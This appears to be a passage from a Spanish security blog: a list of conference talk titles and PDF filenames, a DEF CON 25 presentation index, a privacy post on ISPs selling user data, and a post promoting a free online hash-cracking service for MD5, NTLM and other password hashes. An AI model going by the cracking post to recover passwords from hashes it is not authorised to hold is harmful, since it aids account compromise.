- Mittal-Evading-MicrosoftATA-for-ActiveDirectory-Domination.pdf
Evil Bubbles or How to Deliver Attack Payload via the Physics of the Process
Evilsploit – A Universal Hardware Hacking Toolkit
- Chui-Evilsploit-A-Universal-Hardware-Hacking-Toolkit.pdf
- Chui-Evilsploit-A-Universal-Hardware-Hacking-Toolkit-wp.pdf
Evolutionary Kernel Fuzzing
- Johnson-Evolutionary-Kernel-Fuzzing
Exploit Kit Cornucopia
Exploiting Network Printers
- Mueller-Exploiting-Network-Printers.pdf
Fad or Future? Getting Past the Bug Bounty Hype
Fighting Targeted Malware in the Mobile Ecosystem
- Ruthven-Fighting-Targeted-Malware-In-The-Mobile-Ecosystem.pdf
Fighting the Previous War (aka: Attacking and Defending in the Era of the Cloud)
Firmware is the New Black - Analyzing Past Three Years of BIOS/UEFI Security Vulnerabilities
FlowFuzz - A Framework for Fuzzing OpenFlow-Enabled Software and Hardware Switches
- Gray-FlowFuzz-A-Framework-For-Fuzzing-OpenFlow-Enabled-Software-And-Hardware-Switches.pdf
Fractured Backbone: Breaking Modern OS Defenses with Firmware Attacks
Free-Fall: Hacking Tesla from Wireless to CAN Bus
- Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus.pdf
- Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus-wp.pdf
Friday the 13th: JSON Attacks
- Munoz-Friday-The-13th-Json-Attacks.pdf
- Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
Game of Chromes: Owning the Web with Zombie Chrome Extensions
- Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-wp.pdf
- Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-wp.pdf
Garbage In Garbage Out: How Purportedly Great Machine Learning Models can be Screwed Up by Bad Data
- Sanders-Garbage-In-Garbage-Out-How-Purportedly-Great-ML-Models-Can-Be-Screwed-Up-By-Bad-Data.pdf
- Sanders-Garbage-In-Garbage-Out-How-Purportedly-Great-ML-Models-Can-Be-Screwed-Up-By-Bad-Data-wp.pdf
Go Nuclear: Breaking Radiation Monitoring Devices
- Santamarta-Go-Nuclear-Breaking Radition-Monitoring-Devices.pdf
- Santamarta-Go-Nuclear-Breaking Radition-Monitoring-Devices-wp.pdf
Go to Hunt Then Sleep
- Bianco-Go-To-Hunt-Then-Sleep.pdf
Hacking Hardware with a $10 SD Card Reader
- Etemadieh-Hacking-Hardware-With-A-$10-SD-Card-Reader.pdf
- Etemadieh-Hacking-Hardware-With-A-$10-SD-Card-Reader-wp.pdf
Hacking Serverless Runtimes: Profiling AWS Lambda Azure Functions and More
- Krug-Hacking-Severless-Runtimes.pdf
- Krug-Hacking-Severless-Runtimes-wp.pdf
Honey I Shrunk the Attack Surface – Adventures in Android Security Hardening
How We Created the First SHA-1 Collision and What it Means for Hash Security
Hunting GPS Jammers
- Gostomelsky-Hunting-GPS-Jammers.pdf
Ice Cream Social (Sponsored by Code42 Software Core Security Cybereason Darktrace F5 Networks iboss Malwarebytes & Optiv Security)
Ichthyology: Phishing as a Science
- Burnett-Ichthyology-Phishing-As-A-Science.pdf
- Burnett-Ichthyology-Phishing-As-A-Science-wp.pdf
Industroyer/Crashoverride: Zero Things Cool About a Threat Group Targeting the Power Grid
- Lee-Industroyer-Crashoverride-Zero-Things-Cool-About-A-Threat-Group-Targeting-The-Power-Grid.pdf
Infecting the Enterprise: Abusing Office365+Powershell for Covert C2
- Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
Influencing the Market to Improve Security
- Nakibly-Automated-Detection-of-Vulnerabilities-in-Black-Box-Routers.pdf
- Nakibly-Automated-Detection-of-Vulnerabilities-in-Black-Box-Routers-wp.pdf
Intel AMT Stealth Breakthrough
- Evdokimov-Intel-AMT-Stealth-Breakthrough.pdf
- Evdokimov-Intel-AMT-Stealth-Breakthrough-wp.pdf
Intel SGX Remote Attestation is Not Sufficient
- Swami-SGX-Remote-Attestation-Is-Not-Sufficient-wp.pdf
- Swami-SGX-Remote-Attestation-Is-Not-Sufficient-wp.pdf
Intercepting iCloud Keychain
- Radocea-Intercepting-iCloud-Keychain.pdf
IoTCandyJar: Towards an Intelligent-Interaction Honeypot for IoT Devices
- Luo-Iotcandyjar-Towards-An-Intelligent-Interaction-Honeypot-For-IoT-Devices.pdf
- Luo-Iotcandyjar-Towards-An-Intelligent-Interaction-Honeypot-For-IoT-Devices-wp.pdf
kR^X: Comprehensive Kernel Protection Against Just-In-Time Code Reuse
- Pomonis-KR^X- Comprehensive- Kernel-Protection-Against-Just-In-Time-Code-Reuse.pdf
Lies and Damn Lies: Getting Past the Hype of Endpoint Security Solutions
- Giuliano-Lies-And-Damn-Lies-Getting-Past-The-Hype-Of-Endpoint-Security-Solutions.pdf
Lunch Break (Sponsored by Cisco Forcepoint LogRhythm & RSA)
Many Birds One Stone: Exploiting a Single SQLite Vulnerability Across Multiple Software
- Feng-Many-Birds-One-Stone-Exploiting-A-Single-SQLite-Vulnerability-Across-Multiple-Software.pdf
Mimosa Bar (Sponsored by AlienVault Arbor Networks Carbon Black CrowdStrike Cylance DarkMatter Digital Guardian & IBM)
Network Automation is Not Your Safe Haven: Protocol Analysis and Vulnerabilities of Autonomic Network
- Eissa-Network-Automation-Isn’t-Your-Safe-Haven-Protocol-Analysis-And-Vulnerabilities-Of-Autonomic-Network.pdf
New Adventures in Spying 3G and 4G Users: Locate Track & Monitor
- Borgaonkar-New-Adventures-In-Spying-3G-And-4G-Users-Locate-Track-And-Monitor.pdf
Ochko123 - How the Feds Caught Russian Mega-Carder Roman Seleznev
Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server
- Wardle-Offensive-Malware-Analysis-Dissecting-OSXFruitFly-Via-A-Custom-C&C-Server.pdf
OpenCrypto: Unchaining the JavaCard Ecosystem
- Mavroudis-Opencrypto-Unchaining-The-JavaCard-Ecosystem.pdf
Orange is the New Purple - How and Why to Integrate Development Teams with Red/Blue Teams to Build More Secure Software
- Wright-Orange-Is-The-New-Purple.pdf
- Wright-Orange-Is-The-New-Purple-wp.pdf
PEIMA: Harnessing Power Laws to Detect Malicious Activities from Denial of Service to Intrusion Detection Traffic Analysis and Beyond
Practical Tips for Defending Web Applications in the Age of DevOps
- Lackey-Practical Tips-for-Defending-Web-Applications-in-the-Age-of-DevOps.pdf
Protecting Pentests: Recommendations for Performing More Secure Tests
- McGrew-Protecting-Pentests-Recommendations-For-Performing-More-Secure-Tests.pdf
- McGrew-Protecting-Pentests-Recommendations-For-Performing-More-Secure-Tests-wp.pdf
Protecting Visual Assets: Digital Image Counter-Forensics
- Mazurov-Brown-Protecting-Visual-Assets-Digital-Image-Counter-Forensics.pdf
Pwnie Awards
Quantifying Risk in Consumer Software at Scale - Consumer Reports’ Digital Standard
RBN Reloaded - Amplifying Signals from the Underground
Real Humans Simulated Attacks: Usability Testing with Attack Scenarios
- Cranor-Real-Users-Simulated-Attacks.pdf
Redesigning PKI to Solve Revocation Expiration and Rotation Problems
- Knopf-Redesigning-PKI-To-Solve-Revocation-Expiration-And-Rotation-Problems.pdf
- Knopf-Redesigning-PKI-To-Solve-Revocation-Expiration-And-Rotation-Problems-wp.pdf
Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science
- Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And Evasion-Using-Science.pdf
- Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And Evasion-Using-Science-wp.pdf
rVMI: A New Paradigm for Full System Analysis
- Pfoh-rVMI-A-New-Paradigm-For-Full-System-Analysis.pdf
ShieldFS: The Last Word in Ransomware Resilient File Systems
- Continella-ShieldFS-The-Last-Word-In-Ransomware-Resilient-Filesystems.pdf
- Continella-ShieldFS-The-Last-Word-In-Ransomware-Resilient-Filesystems-wp.pdf
Skype & Type: Keystroke Leakage over VoIP
- Lain-Skype-&-Type-Keystroke-Leakage-Over-VoIP.pdf
Smoothie Social (Sponsored by Bromium Proofpoint Inc. Rapid7 SentinelOne Trend Micro Webroot StackPath & Tanium)
So You Want to Market Your Security Product…
- Alva-So-You-Want-To-Market-Your-Security-Product.pdf
Sonic Gun to Smart Devices: Your Devices Lose Control Under Ultrasound/Sound
- Wang-Sonic-Gun-To-Smart-Devices-Your-Devices-Lose-Control-Under-Ultrasound-Or-Sound.pdf
Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization
- Bates-Splunking-Dark-Tools-A-Pentesters-Guide-To-Pwnage-Visualization.pdf
SS7 Attacker Heaven Turns into Riot: How to Make Nation-State and Intelligence Attackers’ Lives Much Harder on Mobile Networks
- Kacer-SS7-Attacker-Heaven-Turns-Into-Riot-How-To-Make-Nation-State-And-Intelligence-Attackers-Lives-Much-Harder-On-Mobile-Networks.pdf
- Kacer-SS7-Attacker-Heaven-Turns-Into-Riot-How-To-Make-Nation-State-And-Intelligence-Attackers-Lives-Much-Harder-On-Mobile-Networks-wp.pdf
Taking DMA Attacks to the Next Level: How to do Arbitrary Memory Reads/Writes in a Live and Unmodified System Using a Rogue Memory Controller
Taking Over the World Through MQTT - Aftermath
- Lundgren-Taking-Over-The-World-Through-Mqtt-Aftermath.pdf
Taking Windows 10 Kernel Exploitation to the Next Level – Leveraging Write-What-Where Vulnerabilities in Creators Update
- Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level–Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update.pdf
- Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level–Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update-wp.pdf
The Active Directory Botnet
- Miller-The-Active-Directory-Botnet
The Adventures of AV and the Leaky Sandbox
- Kotler-The-Adventures-Of-Av-And-The-Leaky-Sandbox.pdf
- Kotler-The-Adventures-Of-Av-And-The-Leaky-Sandbox-wp.pdf
The Art of Securing 100 Products
- Valtman-The-Art-Of-Securing-100-Products.pdf
The Avalanche Takedown: Landslide for Law Enforcement
The Epocholypse 2038: What’s in Store for the Next 20 Years
- Hypponen-The-Epocholypse-2038-Whats-In-Store-For-The-Next-20-Years.pdf
The Future of ApplePwn - How to Save Your Money
- Yunusov-The-Future-Of-Applepwn-How-To-Save-Your-Money.pdf
The Industrial Revolution of Lateral Movement
- Beery-The-Industrial-Revolution-Of-Lateral-Movement.pdf
The Origin of Array [@@species]: How Standards Drive Bugs in Script Engines
- Silvanovich-The-Origin-Of-Array-Symbol-Species.pdf
The Shadow Brokers – Cyber Fear Game-Changers
They’re Coming for Your Tools: Exploiting Design Flaws for Active Intrusion Prevention
Tracking Ransomware End to End
- Invernizzi-Tracking-Ransomware-End-To-End.pdf
Web Cache Deception Attack
- Gil-Web-Cache-Deception-Attack.pdf
- Gil-Web-Cache-Deception-Attack-wp.pdf
Well that Escalated Quickly! How Abusing Docker API Led to Remote Code Execution Same Origin Bypass and Persistence in the Hypervisor via Shadow Containers
- Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence.pdf
- Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf
What They’re Teaching Kids These Days: Comparing Security Curricula and Accreditations to Industry Needs
- Sanders-What-They’re-Teaching-Kids-These-Days-Comparing-Security-Curricula-And-Accreditations-To-Industry-Needs.pdf
What’s on the Wireless? Automating RF Signal Identification
- Ossmann-Whats-On-The-Wireless-Automating-RF-Signal-Identification.pdf
- Ossmann-Whats-On-The-Wireless-Automating-RF-Signal-Identification-wp.pdf
When IoT Attacks: Understanding the Safety Risks Associated with Connected Devices
- Rios-When-IoT-Attacks-Understanding-The-Safety-Risks-Associated-With-Connected-Devices.pdf
- Rios-When-IoT-Attacks-Understanding-The-Safety-Risks-Associated-With-Connected-Devices-wp.pdf
White Hat Privilege: The Legal Landscape for a Cybersecurity Professional Seeking to Safeguard Sensitive Client Data
- Osborn-White-Hat-Privilege-The-Legal-Landscape-For-A-Cybersecurity-Professional-Seeking-To-Safeguard-Sensitive-Client-Data.pdf
Why Most Cyber Security Training Fails and What We Can Do About it
WiFuzz: Detecting and Exploiting Logical Flaws in the Wi-Fi Cryptographic Handshake
- Ventura-Theyre-Coming-For-Your-Tools-Exploiting-Design-Flaws-For-Active-Intrusion-Prevention.pdf
- Ventura-Theyre-Coming-For-Your-Tools-Exploiting-Design-Flaws-For-Active-Intrusion-Prevention-wp.pdf
- Vanhoef-WiFuzz-Detecting-And-Exploiting-Logical-Flaws-In-The-Wi-Fi-Cryptographic-Handshake-tools.zip
Wire Me Through Machine Learning
- Singh-Wire-Me-Through-Machine-Learning.pdf
WSUSpendu: How to Hang WSUS Clients
- Coltel-WSUSpendu-Use-WSUS-To-Hang-Its-Clients.pdf
- Coltel-WSUSpendu-Use-WSUS-To-Hang-Its-Clients-wp.pdf
Zero Days Thousands of Nights: The Life and Times of Zero-Day Vulnerabilities and Their Exploits
- Ablon-Zero-Days-Thousands-Of-Nights-The-Life-And-Times-Of-Zero-Day-Vulnerabilities-And-Their-Exploits.pdf

Fuente:

Presentaciones de la DEF CON 25 (PDF)

noreply@blogger.com (Leo Romero) — Mon, 31 Jul 2017 10:49:00 -0400

Sin lugar a duda DEF CON es la conferencia de seguridad informática y hacking más grande y con los mejores exponentes a nivel mundial. En esta ocasión les traigo las presentaciones de la versión 25 de este encuentro. Vale la pena revisarlas para entender a que amenazas nos enfrentamos hoy en día. Espero las disfruten:

File Name	Tamaño Archivo
5A1F/	-
Cheng Lei/	-
Denton Gentry/	-
Dimitry Snezhkov/	-
Dor Azouri/	-
Duncan Woodbury and Nicholas Haltmeyer/	-
Itzik Kotler and Amit Klein/	-
Josh Pitts/	-
Mark Newlin Logan Lamb and Christopher Grayson/	-
Matt Knight and Marc Newlin/	-
Matt Suiche/	-
Morten Schenk/	-
Phillip Tully and Michael Raggo/	-
Romain Coltel and Yves Le Provost/	-
Steinthor Bjarnason and Jason Jones/	-
Tomer Cohen/	-
DEFCON-25-0ctane-Untrustworthy-Hardware.pdf	2.5 MiB
DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf	1.8 MiB
DEFCON-25-Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf	3.0 MiB
DEFCON-25-Artem-Kondratenko-Cisco-Catalyst-Exploitation.pdf	2.5 MiB
DEFCON-25-Ayoul3-Dealing-the-Perfect-Hand-Shuffling-memory-blocks-on-zOS.pdf	3.2 MiB
DEFCON-25-Caleb-Madrigal-IOT-Hacking-With-SDR.pdf	4.3 MiB
DEFCON-25-Chris-Thompson-MS-Just-Gave-The-Blue-Teams-Tactical-Nukes.pdf	2.4 MiB
DEFCON-25-Christopher-Domas-Breaking-The-x86-ISA.pdf	5.0 MiB
DEFCON-25-Cincvolflt-Inside-The-Meet-Desai-Attack.pdf	1.8 MiB
DEFCON-25-Damien-Cauquil-Weaponizing-the-BBC-MicroBit.pdf	2.2 MiB
DEFCON-25-Daniel-Bohannon-and-Lee-Holmes-Revoke-Obfuscation.pdf	6.9 MiB
DEFCON-25-Datko-and-Quartier-Breaking-Bitcoin-Hardware-Wallets.pdf	799.3 KiB
DEFCON-25-Dhia-Mahjoub-and-Thomas-Mathew-Malicious-CDNs-Identifying-Zbot-Domains-en-Masse.pdf	616.5 KiB
DEFCON-25-Foofus-Secret-Tools-Learning-About-Gov-Surveillance-Software.pdf	69.2 KiB
DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Course-Guide.pdf	2.0 MiB
DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Lab-Setup-Guide.pdf	1.7 MiB
DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks.pdf	7.4 MiB
DEFCON-25-Gerald-Steere-and-Sean-Metcalf-Hacking-the-Cloud.pdf	2.4 MiB
DEFCON-25-Gil-Cohen-Call-The-Plumber-You-Have-A-Leak-In-Your-(named)-Pipe.pdf	4.0 MiB
DEFCON-25-Gus-Frischie-and-Evan-Teitelman-Backdooring-the-Lottery.pdf	2.7 MiB
DEFCON-25-Hanno-Boeck-Abusing-Certificate-Transparency-Logs.pdf	250.0 KiB
DEFCON-25-Haoqi-Shan-and-Jian-Yuan-Man-in-the-NFC.pdf	2.3 MiB
DEFCON-25-Hernandez-Richards-MacDonald-Evoy-Tracking-Spies-in-the-Skies.pdf	6.0 MiB
DEFCON-25-Hyrum-Anderson-Evading-Next-Gen-AV-Using-AI.pdf	4.6 MiB
DEFCON-25-Ilja-van-Sprundel-BSD-Kern-Vulns.pdf	2.0 MiB
DEFCON-25-Inbar-and-Eden-Story-of-Early-Israeli-Hacking-Community.pdf	4.1 MiB
DEFCON-25-Jason-Staggs-Breaking-Wind-Hacking-Wind-Farm-Control-Networks.pdf	4.2 MiB
DEFCON-25-Jesse-Michael-and-Mickey-Shkatov-Driving-Down-the-Rabbit-Hole.pdf	10.6 MiB
DEFCON-25-Jhaddix-HUNT-Data-Driven-Web-Hacking-and-Manual-Testing.pdf	4.2 MiB
DEFCON-25-Jim-Nitterauer-DNS-Devious-Name-Services-Destroying-Privacy-Anonymity-Without-Your-Consent.pdf	2.2 MiB
DEFCON-25-Joe-Rozner-Wiping-Out-CSRF.pdf	131.4 KiB
DEFCON-25-Karit-ZX-Security-Using-GPS-Spoofing-To-Control-Time.pdf	4.5 MiB
DEFCON-25-Konstantinos-Karagiannis-Hacking-Smart-Contracts.pdf	1.5 MiB
DEFCON-25-Lee-Holmes-Attacking-Battle-Hardened-Windows-Server.pdf	290.1 KiB
DEFCON-25-Marina-Simakov-and-Igal-Gofman-Here-to-stay-Gaining-persistence-by-abusing-auth-mechanisms.pdf	3.0 MiB
DEFCON-25-Matt-Wixey-See-No-Evil-Hear-No-Evil.pdf	6.0 MiB
DEFCON-25-Max-Bazaliy-Jailbreaking-Apple-Watch.pdf	1.3 MiB
DEFCON-25-Mikhail-Sosonkin-Hacking-Travel-Routers-Like-1999.pdf	6.5 MiB
DEFCON-25-Min-Spark-Zheng-macOS-iOS-Kernel-Debugging.pdf	5.5 MiB
DEFCON-25-Nathan-Seidle-Open-Source-Safe-Cracking-Robots.pdf	4.8 MiB
DEFCON-25-Omar-Eissa-Attacking-Autonomic-Networks.pdf	2.4 MiB
DEFCON-25-Orange-Tsai-A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages.pdf	5.9 MiB
DEFCON-25-Owen-Snide-Phone-System-Testing-and-other-fun-tricks.pdf	1.9 MiB
DEFCON-25-Patrick-DeSantis-From-Box-to-Backdoor-Using-Old-School-Tools.pdf	4.5 MiB
DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly.pdf	8.4 MiB
DEFCON-25-Plore-Popping-a-Smart-Gun.pdf	4.1 MiB
DEFCON-25-Professor-Plum-Digital Vengeance-Exploiting-Notorious-Toolkits.pdf	6.7 MiB
DEFCON-25-Roger-Dingledine-Next-Generation-Tor-Onion-Services.pdf	2.2 MiB
DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-Security.pdf	2.5 MiB
DEFCON-25-Salvador-Mendoza-Exploiting-0ld-Magstripe-Info-with-New-Technology.pdf	5.2 MiB
DEFCON-25-Scott-Behrens-and-Jeremy-Heffner-Starting-The-Avalanche-Application-DoS-In-Microservice-Architectures.pdf	2.0 MiB
DEFCON-25-Slava-Makkaveev-and-Avi-Bashan-Unboxing-Android.pdf	911.6 KiB
DEFCON-25-Stephan-Huber-and-Seigfried-Rasthofer-Password-Manager-Investigation.pdf	6.0 MiB
DEFCON-25-Suggy-Sumner-Rage-Against-The-Weaponized-AI-Propaganda-Machine.pdf	6.8 MiB
DEFCON-25-Svea-Eckert-Andreas-Dewes-Dark-Data.pdf	6.2 MiB
DEFCON-25-Tess-Schrodinger-Total-Recall.pdf	5.0 MiB
DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-WP.pdf	2.0 MiB
DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions.pdf	20.7 MiB
DEFCON-25-Vasillios-Mavroudis-Trojan-Tolerant-Hardware.pdf	1.9 MiB
DEFCON-25-Weston-Hecker-Opt-Out-or-Deauth-Trying.pdf	2.2 MiB
DEFCON-25-Whitney-Merrill-and-Terrell-McSweeny-Tick-Tick-Boom-Tech-and-the-FTC.pdf	4.9 MiB
DEFCON-25-William-Knowles-Persisting-With-Microsoft-Office.pdf	2.8 MiB
DEFCON-25-XlogicX-Assembly-Language-Is-Too-High-Level.pdf	7.5 MiB
DEFCON-25-Yuwei-Zheng-UnicornTeam-Ghost-Telephonist.pdf	1.6 MiB
DEFCON-25-chaosdata-Ghost-in-the-Droid-ParaSpectre.pdf	5.1 MiB
DEFCON-25-r00killah-and-securelyfitz-Secure-Tokin-and-Doobiekeys.pdf	3.2 MiB
DEFCON-25-skud-and-Sky-If-You-Give-A-Mouse-A-Microchip.pdf	5.8 MiB
DEFCON-25-spaceB0x-Exploiting-Continuous-Integration.pdf	2.0 MiB
DEFCON-25-zerosum0x0-alephnaught-Koadic-C3.pdf	1.9 MiB

Enjoy!

[!] Salu2
[i] Zion3R

Privacidad y Anonimato en un Mundo de Datos ¿Imposible?

noreply@blogger.com (Leo Romero) — Thu, 6 Apr 2017 20:50:00 -0300

Para un hacker es fácil realizar un ataque a través de una VPN, Proxy, TOR, servidor comprometido... Pero el resto del tiempo, como un ser humano normal ¿Tendrá el dinero para comprar una buena VPN?, ¿Tendrá la paciencia para dirigir su tráfico a través de TOR, esperar largos tiempos de espera y posibles bloqueos?

En la mayoría de los países con una orden judicial las policías pueden pedir los datos de un cliente al ISP correspondiente, pero eso luego de un delito, una investigación y largo papeleo. Por lo cual existe una cierta "sensación" de seguridad y privacidad para el resto de los humanos, ya que no cometemos delitos, así que nadie nos va investigar ni ver nuestro historial de Internet...

Pero el Congreso de Estados Unidos recientemente aprobó un proyecto de ley que permite a los proveedores de Internet (ISP) vender datos de sus usuarios, como los historiales de búsqueda o la localización. ¿Y por qué esto nos debe importar? Pues bueno, porqué todas nuestras comunicaciones pasan por USA ~~(Por ejemplo, esta misma web está alojada allá)~~.

Quiero que vean un vídeo de Marta Peirano donde podemos ver las verdaderas consecuencias a las que se puede llegar si es que efectivamente se venden nuestros datos, el vídeo es sólo la punta del iceberg de lo que los ISP almacenan sobre nosotros y como pueden conocerte mejor que tu mismo...

Quién te está vigilando

Para los que les llamó la atención de la historia de Malte Spitz, les dejo el link con la visualización de los datos que almacenan los proveedores de Internet:

http://www.zeit.de/datenschutz/malte-spitz-data-retention

Duerman tranquilos...

[+] Salu2
[°] Zion3R

Crack MD5, SHA1, MySQL, NTLM Free Online!

noreply@blogger.com (Leo Romero) — Tue, 22 Nov 2016 12:12:00 -0300

Hace algún tiempo salió InsidePro Hash Finder un buscador de hashes másivo, gratuito y online donde se pueden encontrar hasta 25 mil hashes de una tanda. Detecta automáticamente el hash que buscas y encuentra la mayoría de las veces el password. Soporta más de 100 algoritmo, entre ellos:

MD5
SHA-1
MySQL
NTLM
vbulliten
oscommerce
Invision Power Board
Joomla
MyBB
SMF
MaNGOS
LM
md4
md5(md5_hex)
md5-half
sha224
sha256
sha384
sha512
ripeMD160
whirlpool
MySQL 4.1+ (sha1(sha1_bin))
md5(md5($salt).md5($pass))
etc...

InsidePro Hash Finder

Otras alternativas son:

Pero definitivamente me quedo con InsidePro Hash Finder.

[+] Salu2
[*] Zion3R

decrypt, free hash cracker, free hash cracking, free hash database, free md5 decryptor, hash checker, hash cracker, hash cracking, hashcracking, hash cracking service, hash database, hash decrypter, hash finder, Invision Power Board, Joomla, LM, MaNGOS, md2, md4, MD5, md5 crack, md5 cracking, md5 decrypter, md5 decryption, md5 encrypter, md5 encryption, md5 encryptor, md5 hacking, md5 hash, md5 hash cracking, md5 hash database, md5 security, md5(md5_hex), md5-half, MyBB, MySQL, MySQL 4.1+ (sha1(sha1_bin)), NTLM, ntlm cracker, ntlm cracking, ntlm decrypter, ntlm decryption, ntlm hash, online hash cracking, online md5 cracker, oscommerce, pass salt, password cracking, password recovery, password recovery service, QubesV3.1BackupDefaults, ripeMD160, salt, salt pass, SHA-1, sha1, sha1 crack, sha1 cracker, sha1 cracking, sha1 decrypter, sha1 decryption, sha1 hash, sha224, sha256, sha384, sha512, SMF, vbulliten, whirlpool